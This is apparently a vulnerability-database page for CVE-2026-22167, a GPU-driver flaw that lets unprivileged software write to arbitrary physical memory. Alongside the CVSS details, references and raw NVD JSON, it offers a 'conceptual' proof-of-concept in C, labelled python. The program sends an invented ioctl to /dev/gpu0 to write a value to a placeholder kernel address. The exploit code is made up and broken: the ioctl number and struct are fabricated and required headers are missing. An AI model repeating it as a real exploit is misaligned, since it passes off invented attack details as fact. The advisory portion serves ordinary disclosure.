CVE-2026-22167

Description

Software installed and run as a non-privileged user may conduct improper GPU system calls to force GPU to write to arbitrary physical memory pages. Under certain circumstances this exploit could be used to corrupt data pages not allocated by the GPU driver but memory pages in use by the kernel and drivers running on the platform altering their behaviour. This attack can lead the GPU to perform write operations on restricted internal GPU buffers that can lead to a second order affect of corrupted arbitrary physical memory.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Imagination Technologies GPU Driver (具体受影响版本请参考供应商安全公告)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

/*
 * Conceptual Proof of Concept for CVE-2026-22167
 * This code simulates the improper GPU system call.
 */
#include <stdio.h>
#include <stdint.h>

// Simulated IOCTL command for the vulnerable GPU driver
#define GPU_IOCTL_WRITE_PHYS 0x8001

struct gpu_write_req {
    uint64_t physical_address; // Target physical memory address
    uint32_t data;             // Data to write
    uint32_t size;             // Size of write operation
};

int main() {
    printf("[*] CVE-2026-22167 PoC Trigger\n");

    int fd = open("/dev/gpu0", O_RDWR);
    if (fd < 0) {
        printf("[-] Failed to open device\n");
        return 1;
    }

    struct gpu_write_req req;
    // Targeting a restricted physical memory page (e.g., kernel structure)
    req.physical_address = 0xabcdef000; 
    req.data = 0xdeadbeef;
    req.size = 4;

    printf("[*] Attempting to write 0x%x to physical address 0x%lx\n", req.data, req.physical_address);

    // Perform the vulnerable system call
    if (ioctl(fd, GPU_IOCTL_WRITE_PHYS, &req) != 0) {
        printf("[-] IOCTL failed (maybe patched?)\n");
    } else {
        printf("[+] IOCTL succeeded. Memory corruption may have occurred.\n");
    }

    close(fd);
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-22167
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-22167
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-22167/
[4] VulDB https://vuldb.com/cve/CVE-2026-22167
[5] https://www.imaginationtech.com/gpu-driver-vulnerabilities/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-22167", "sourceIdentifier": "367425dc-4d06-4041-9650-c2dc6aaa27ce", "published": "2026-05-01T16:16:29.693", "lastModified": "2026-05-06T19:05:56.337", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Software installed and run as a non-privileged user may conduct improper GPU system calls to force GPU to write to arbitrary physical memory pages.\n\n\n\nUnder certain circumstances this exploit could be used to corrupt data pages not allocated by the GPU driver but memory pages in use by the kernel and drivers running on the platform altering their behaviour.\n\n\n\nThis attack can lead the GPU to perform write operations on restricted internal GPU buffers that can lead to a second order affect of corrupted arbitrary physical memory."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "367425dc-4d06-4041-9650-c2dc6aaa27ce", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}]}], "references": [{"url": "https://www.imaginationtech.com/gpu-driver-vulnerabilities/", "source": "367425dc-4d06-4041-9650-c2dc6aaa27ce"}]}}